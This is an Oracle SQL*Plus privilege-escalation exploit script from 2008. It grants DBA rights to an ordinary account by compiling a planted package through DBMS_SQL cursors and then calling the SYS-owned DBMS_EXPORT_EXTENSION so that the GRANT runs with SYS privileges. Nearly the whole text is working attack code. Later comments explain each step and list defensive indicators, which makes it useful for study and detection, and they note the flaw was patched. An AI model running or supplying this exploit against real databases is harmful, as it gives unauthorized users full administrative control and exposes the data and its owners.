-- -----------------------------------------------------------------------------
-- www.vietpace.com | www.baomatoracle.com
-- -----------------------------------------------------------------------------
-- Script Name : dbms_exp_ext_c_local.sql
-- Author      : VietPace
-- Date        : Oct 2008
-- -----------------------------------------------------------------------------
-- Description : This script can be used to grant or revoke DBA permission to
--               an unprivileged user.
--
-- Refer       : Andrea "bunker" Purificato
--
-- Requirement : 1. CREATE SESSION
-- -----------------------------------------------------------------------------
-- Maintainer  : VietPace (www.vietpace.com | www.baomatoracle.com)
-- Copyright   : Copyright (C) 2008 www.vietpace.com Limited. All rights
--               reserved. All registered trademarks are the property of their
--               respective owners and are hereby acknowledged.
-- -----------------------------------------------------------------------------
-- Usage       : The script provided here is available free. You can do anything
--               you want with it commercial or non commercial as long as the
--               copyrights and this notice are not removed or edited in any way.
--               The scripts cannot be posted / published / hosted or whatever
--               anywhere else except at www.vietpace.com | www.baomatoracle.com
-- -----------------------------------------------------------------------------
-- Version History
-- ===============
--
-- Who        version  Date         Description
-- ===        =======  ======       ======================
-- VietPace   1.0      19 Oct 2008  First Issue.
-- VietPace   1.0      20 Oct 2008  Change to local attack.
-- -----------------------------------------------------------------------------
-- SQL*Plus session setup: abort and roll back on the first SQL error, fix the
-- page layout, and capture the whole run to a spool file.
whenever sqlerror exit rollback
set feed on
set head on
set arraysize 1
set space 1
set verify off
set pages 25
set lines 80
set termout on
clear screen
set serveroutput on size 1000000
-- Everything from here to "spool off" is also written to this file in the
-- current working directory (a local artefact of every run).
spool dbms_exp_ext_c.lis
-- Clear stale substitution variables so the accept prompts below always ask.
undefine user_name
undefine grant_revoke
set feed off
-- Banner timestamp: the column value is captured into val_system_date (noprint).
col system_date noprint new_value val_system_date
select to_char(sysdate,'Dy Mon dd hh24:mi:ss yyyy') system_date from sys.dual;
prompt dbms_exp_ext_c: Release 1.0 - Production on &val_system_date
prompt Copyright (c) 2008 WWW.VIETPACE.COM Limited. All rights reserved.
set feed on
prompt
-- Operator input. Both values are spliced verbatim into SQL text below
-- (SQL*Plus substitution happens before the block is compiled), so they are
-- never validated or quoted. Defaults: SCOTT and G.
accept user_name char prompt 'USERNAME TO CHECK [SCOTT]: ' default SCOTT
accept grant_revoke char prompt 'PRIVS CONTROL [G]rant/[R]evoke [G]: ' default G
prompt
-- Anonymous block. In [G]rant mode it follows the DBMS_EXPORT_EXTENSION /
-- cursor-injection technique credited to Purificato in the header: a
-- user-owned package is compiled through DBMS_SQL cursors, then the SYS-owned
-- DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA is invoked with that
-- package's name so that the GRANT inside it runs with the privileges of the
-- SYS-owned caller. This relied on a weakness in that SYS package that Oracle
-- security patches removed years ago (the page does not name the patch); on a
-- patched instance the final call is expected to fail and land in the WHEN
-- OTHERS handler at the end of the block.
-- Defensive indicators visible from this code: a non-SYS session calling
-- SYS.DBMS_EXPORT_EXTENSION, a package named BUNKERPKG exposing
-- ODCIIndexGetMetadata, a GRANT of DBA to an ordinary account, the spool file
-- above, and rows inserted into an app_log table (see the live inserts below).
declare
  --
  -- 'G' = grant (default), 'R' = revoke; overwritten from the prompt below.
  lv_grant_revoke varchar2(1) := 'G';
  -- Statement the injected package body will run; the user name comes straight
  -- from the prompt.
  lv_sqlcmd varchar2(1000):= 'GRANT ALL PRIVILEGE, DBA TO ' ||upper('&&user_name');
  -- PL/SQL text that opens a DBMS_SQL cursor and parses a CREATE PACKAGE into it.
  lv_evil_cursor varchar2(1000);
  -- One line read back from DBMS_OUTPUT ("Cursor1 <n>" / "Cursor2 <n>").
  lv_cursor_output varchar2(100);
  -- Status out-parameter of dbms_output.get_line (0 when a line was returned).
  lv_nol number := 2;
  -- Cursor number parsed out of lv_cursor_output.
  lv_cursor_number varchar2(10);
  -- PL/SQL text that executes that cursor through SYS.DBMS_SQL.
  lv_exec_cursor varchar2(1000);
  -- PL/SQL text that calls SYS.DBMS_EXPORT_EXTENSION against the package.
  lv_run_inject_cursor varchar2(1000);
  --
  --
begin
  dbms_output.enable(1000000);
  lv_grant_revoke:=upper('&&grant_revoke');
  -- [R]evoke path: a plain REVOKE issued directly by the connected user, so it
  -- only succeeds if that user already holds the right to revoke (no injection
  -- involved). Any value other than R falls through to the grant path.
  if lv_grant_revoke='R' then
    dbms_output.put_line('--- REVOKING DBA FROM '||upper('&&user_name')||'...');
    lv_sqlcmd := 'REVOKE ALL PRIVILEGE, DBA FROM ' || upper('&&user_name');
    execute immediate lv_sqlcmd;
    dbms_output.put_line('--- DONE!');
    return;
  end if;
  -- Step 1: compile the package SPEC (AUTHID CURRENT_USER) via a DBMS_SQL
  -- cursor opened in a nested anonymous block. That block prints "Cursor1 <n>"
  -- so the cursor number can be recovered from the DBMS_OUTPUT buffer.
  lv_evil_cursor := 'DECLARE MYC_PKG_1 NUMBER;'||
    'BEGIN MYC_PKG_1 := DBMS_SQL.OPEN_CURSOR; ' ||
    'DBMS_SQL.PARSE(MYC_PKG_1,'''||
    'CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER '||
    'IS FUNCTION ODCIIndexGetMetadata (a SYS.odciindexinfo, ' ||
    'b VARCHAR2,c VARCHAR2, d SYS.odcienv) RETURN NUMBER; END;'',0); '||
    'DBMS_OUTPUT.PUT_LINE(''Cursor1 ''||MYC_PKG_1); END;';
  --insert into app_log values(sysdate,lv_evil_cursor); commit;
  execute immediate lv_evil_cursor;
  lv_cursor_output:='';
  dbms_output.get_line(lv_cursor_output,lv_nol);
  --insert into app_log values(sysdate,'lv_cursor_output1:'||lv_cursor_output); commit;
  -- "Cursor1 " is 8 characters, so position 9 onwards is the cursor number.
  lv_cursor_number := substr(lv_cursor_output,9);
  -- Step 2: execute the already-parsed cursor through SYS.DBMS_SQL from a
  -- different block than the one that parsed it - the "cursor injection" the
  -- script announces further down.
  lv_exec_cursor := 'declare ret NUMBER;begin ret := sys.dbms_sql.execute('||lv_cursor_number||'); end;';
  -- Live (not commented-out) debug insert: leaves the generated statement in
  -- the app_log table of the connected schema.
  insert into app_log values(sysdate,lv_exec_cursor); commit;
  execute immediate lv_exec_cursor;
  -- Step 3: the same sequence for the package BODY. ODCIIndexGetMetadata runs
  -- lv_sqlcmd via EXECUTE IMMEDIATE inside an autonomous transaction and
  -- commits, so the GRANT persists independently of the caller's transaction.
  -- lv_sqlcmd sits two string levels deep, hence the doubled-up quotes.
  lv_evil_cursor := 'DECLARE MYC_PKG_2 NUMBER;'||
    'BEGIN MYC_PKG_2 := DBMS_SQL.OPEN_CURSOR;' ||
    'DBMS_SQL.PARSE(MYC_PKG_2,'''||
    'CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS '||
    'FUNCTION ODCIIndexGetMetadata (a SYS.odciindexinfo, b VARCHAR2,'||
    'c VARCHAR2, d SYS.odcienv) RETURN NUMBER IS '||
    'PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''' || lv_sqlcmd ||''''';'||' COMMIT; RETURN(1); END;END;'',0); '||
    'DBMS_OUTPUT.PUT_LINE(''Cursor2 ''||MYC_PKG_2); END;';
  -- Live debug insert, as above.
  insert into app_log values(sysdate,lv_evil_cursor); commit;
  execute immediate lv_evil_cursor;
  lv_cursor_output:='';
  dbms_output.get_line(lv_cursor_output,lv_nol);
  --insert into app_log values(sysdate,'lv_cursor_output2:'||lv_cursor_output); commit;
  lv_cursor_number := substr(lv_cursor_output,9);
  lv_exec_cursor := 'declare ret NUMBER;begin ret := sys.dbms_sql.execute('||lv_cursor_number||'); end;';
  --insert into app_log values(sysdate,lv_exec_cursor); commit;
  execute immediate lv_exec_cursor;
  dbms_output.put_line('--- CHECK CURSOR INJECTION');
  -- Step 4: ask the SYS-owned package for "domain index metadata", naming
  -- BUNKERPKG (owned by the prompted user) as the implementation. The technique
  -- relied on that package calling back into the user's ODCIIndexGetMetadata
  -- under its own (SYS) privileges, which is what let the GRANT succeed on
  -- unpatched releases.
  lv_run_inject_cursor := 'DECLARE PLS PLS_INTEGER; '||
    'RET VARCHAR2(200);BEGIN RET := '||
    'SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(''A'',''' || upper('&&user_name')||''',''BUNKERPKG'','''|| upper('&&user_name')||''','''',PLS,0);END;';
  --insert into app_log values(sysdate,lv_run_inject_cursor);
  --commit;
  execute immediate lv_run_inject_cursor;
  dbms_output.put_line('--- WE GOT THE POWAH!!');
exception
  -- Catch-all: any failure (including the expected one on a patched instance)
  -- is reported as code + message and the block completes normally, so the
  -- "whenever sqlerror exit" above does not fire for it.
  when others then
    dbms_output.put_line('ERROR: '||sqlcode);
    dbms_output.put_line('MSG: '||sqlerrm);
end;
/
prompt
prompt For updates please visit WWW.VIETPACE.COM | WWW.BAOMATORACLE.COM
prompt
spool off
-- Restore the default error behaviour for whatever runs next in the session.
whenever sqlerror continue